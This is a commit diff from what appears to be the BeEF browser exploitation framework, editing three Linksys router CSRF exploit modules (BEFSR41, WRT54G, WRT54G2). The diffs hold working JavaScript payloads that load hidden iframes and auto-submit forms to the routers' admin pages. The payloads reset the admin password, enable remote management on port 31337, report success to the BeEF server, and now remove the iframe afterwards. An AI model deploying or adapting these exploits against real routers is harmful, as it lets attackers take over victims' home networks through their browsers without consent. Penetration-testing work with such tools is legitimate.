Added cleanup() function to router exploits

Removed `username:password@` portion of example target URLs as unfortunately this triggers warnings in most modern browsers. The modules target CSRF vulnerabilities and it's expected and acceptable behaviour to rely on the user having an authorized session by default. "Advanced users" will be familiar with the `username:password@` trick and can add it to the URL if they desire.
2012-03-03 20:43:56 +10:30
parent 63805d943d
commit 5c678a2550
6 changed files with 31 additions and 9 deletions
--- a/modules/router/linksys_befsr41_csrf/command.js
+++ b/modules/router/linksys_befsr41_csrf/command.js
@@ -14,7 +14,15 @@
 //   limitations under the License.
 //
 beef.execute(function() {
-  var iframe = beef.dom.createInvisibleIframe();
-  iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+
+  var befsr41_iframe = beef.dom.createInvisibleIframe();
+  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(befsr41_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+
--- a/modules/router/linksys_befsr41_csrf/module.rb
+++ b/modules/router/linksys_befsr41_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_befsr41_csrf < BeEF::Core::Command
  
  def self.options
    return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
        {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
        {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}  
    ]
--- a/modules/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/router/linksys_wrt54g2_csrf/command.js
@@ -20,7 +20,7 @@ beef.execute(function() {

  var target = gateway + "Manage.tri";

-  var iframe = beef.dom.createInvisibleIframe();
+  var wrt54g2_iframe = beef.dom.createInvisibleIframe();

  var form = document.createElement('form');
  form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
  input.setAttribute('value', 'en');
  form.appendChild(input);

-  iframe.contentWindow.document.body.appendChild(form);
+  wrt54g2_iframe.contentWindow.document.body.appendChild(form);
  form.submit();

  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wrt54g2_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+
--- a/modules/router/linksys_wrt54g2_csrf/module.rb
+++ b/modules/router/linksys_wrt54g2_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_wrt54g2_csrf < BeEF::Core::Command
  
  def self.options
    return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
        {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
        {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}  
    ]
--- a/modules/router/linksys_wrt54g_csrf/command.js
+++ b/modules/router/linksys_wrt54g_csrf/command.js
@@ -20,7 +20,7 @@ beef.execute(function() {

  var target = gateway + "manage.tri";

-  var iframe = beef.dom.createInvisibleIframe();
+  var wrt54g_iframe = beef.dom.createInvisibleIframe();

  var form = document.createElement('form');
  form.setAttribute('action', target);
@@ -100,8 +100,15 @@ beef.execute(function() {
  input.setAttribute('value', 'en');
  form.appendChild(input);

-  iframe.contentWindow.document.body.appendChild(form);
+  wrt54g_iframe.contentWindow.document.body.appendChild(form);
  form.submit();

  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wrt54g_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
 });
+
--- a/modules/router/linksys_wrt54g_csrf/module.rb
+++ b/modules/router/linksys_wrt54g_csrf/module.rb
@@ -17,7 +17,7 @@ class Linksys_wrt54g_csrf < BeEF::Core::Command
  
  def self.options
    return [
-        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}, 
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
        {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
        {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
    ]